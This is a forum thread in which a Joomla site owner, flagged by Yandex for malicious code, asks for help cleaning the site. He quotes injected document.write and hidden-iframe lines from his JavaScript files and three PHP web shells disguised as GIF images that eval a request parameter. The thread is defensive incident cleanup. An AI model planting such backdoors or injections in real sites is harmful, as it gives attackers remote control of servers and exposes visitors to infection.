Сайт содержит код, который может быть опасен для посетителей.

Товарищи помогите...

вчера пришло письмо в панели вебмастера:

"На страницах сайта newregion-xm.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных.

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.

Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта."


и в списке страниц есть главная страница http://newregion-xm.ru/


но как я не смотрел код главной страницы так и не нашел ничего подозрительного кроме одного места:

Код (PHP):

1. <!--[if lte IE 6]><script src="/plugins/system/J2top/fixed.js" type="text/javascript"></script><![endif]-->
2.   <script type="text/javascript">if( MooTools.version >= '1.2' ) {
3.     window.addEvent('domready',function() {
4.     new SmoothScroll({ duration: 250 }, window);
5.     var gototop = $('gototop');
6.     gototop.setStyle('opacity','0').setStyle('display','block');
7.     });
8.     window.addEvent('scroll',function(e) {
9.         var gototop = $('gototop');
10.         if(Browser.Engine.trident4) {
11.             gototop.setStyles({
12.                 'position': 'absolute',
13.                 'bottom': window.getPosition().y + 10,
14.                 'width': 100
15.             });
16.         }
17.         gototop.fade((window.getScroll().y > 200) ? 'in' : 'out')
18.     });
19. } else {
20.     window.addEvent('domready',function() {
21.     $('gototop').setStyle('opacity','0');
22.     new SmoothScroll();
23.     var Change = new Fx.Style('gototop', 'opacity', {duration:250});
24.     var scroll = window.getScrollTop();
25.     if (scroll > 200){
26.         if ($('gototop').getStyle('opacity','0') == 0){Change.start(1);$('gototop').setStyle('display','');}
27.     }
28.     });
29.     window.addEvent('scroll',function(e) {
30.     var scroll = window.getScrollTop();
31.     var Change = new Fx.Style('gototop', 'opacity', {duration:250});
32.     function Show(){ $('gototop').setStyle('display','');}
33.     function Hide(){ setTimeout("$('gototop').setStyle('display','none')",250);}
34.     if (scroll > 200){
35.         if ($('gototop').getStyle('opacity','0') == 0){Show();Change.start(1);}
36.     } else {
37.         if ($('gototop').getStyle('opacity','1') == 1){Change.start(0);Hide();}
38.     }
39.     });
40. }
41. </script>

может ли яндекс посчитать это за вирус????

спасибо заранее...

 

вот что нашел в каждом файле *.js

Код (PHP):

1. ;document.write(unescape(".............OOO)));

Как это убрать из всех яваскрипт файлов?

 

сделал проще - удалил все из корневой папки - и попросил ТП хостера восстановить резервные копии от 15 марта - вроде глянул в несколько фалов js - чистые

 

и еще вопрос - как можно (вернее чем) почистить сайт от шелов?
и каким образом найти уязвимое расширение?

 

Нашел вчера в папке /images/stories подозрительные файлы

f1h3a.gif - ничем не открывается кроме блокнота с таким содержанием:

Код (PHP):

1. GIF89a1
2. <?php
3. if (isset($_REQUEST['p1'])) {
4.     eval(stripslashes($_REQUEST['p1']));
5. } else {
6.     echo "djeu84m";
7. }
8. ?>

story.gif с содержанием

Код (PHP):

1. GIF89a1
2. <?php
3. if (isset($_REQUEST['p1'])) {
4.     eval(stripslashes($_REQUEST['p1']));
5. } else {
6.     echo "djeu84m";
7. }
8. ?>

gif.php с содержанием

Код (PHP):

1. GIF89a1
2. <?php if (isset($_REQUEST['p1'])) eval(stripslashes($_REQUEST['p1'])); ?>

Кто нибудь может подсказать их назначение (этих файлов) и как они попали в эту папку.

как бы сделать так чтоб в эту папку никто ничего не заталкивал не нужного??

 

Да, еще хотел спросить:

в каждом *.js файле в конце такие строки:

Код (PHP):

1. ;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="<html>
2. <head><title>502 Bad Gateway</title></head>
3. <body bgcolor="white">
4. <center><h1>502 Bad Gateway</h1></center>
5. <hr><center>nginx</center>
6. </body>
7. </html>
8. " height="350" width="250"></iframe>');

повторяются раз 5 - 10

что это значит и надо ли оно там?

 

очень помог скрипт replace.php

нашел и заменил на пусто все эти не нужные записи в js файлах

 

Еще JAMSS - Joomla! Anti-Malware Scan Script - v.1.0.4 ругается на:

Код (html):

1. In file ./administrator/components/com_admin/admin.admin.html.php-> we found 2 occurence(s) of Pattern #18 - IFRAME element
2. ---> Details: "Found IFRAME element in code, please check if it's a valid code."
3.  
4. @Offset: 7259:
5. ... <iframe name="helpFrame" src="<?php echo $fullhelpurl .preg_replace( '#\.xml$|\.html$#', '', $page );?>" class="helpFrame" frameborder="0"></iframe>
6.                     <?php
7.                 } else {
8.                     ?>
9.                     <iframe name=" ...
10. @Offset: 7445:
11. ... <iframe name="helpFrame" src="<?php echo JURI::base() .'help/' .$langTag. '/' . $page;?>" class="helpFrame" frameborder="0"></iframe>
12.                     <?php
13.                 }
14.                 ?>
15.             </fieldset>
16.         </div>
17.  
18.         <input type="hi ...
19. --> ./administrator/components/com_admin/admin.admin.html.php is a file. It was last accessed: 2013-03-31T13:28:12+06:00, last changed: 2013-03-30T08:22:48+06:00, last modified: 2013-01-09T00:16:57+06:00.
20. File permissions:0644

это тоже вирус?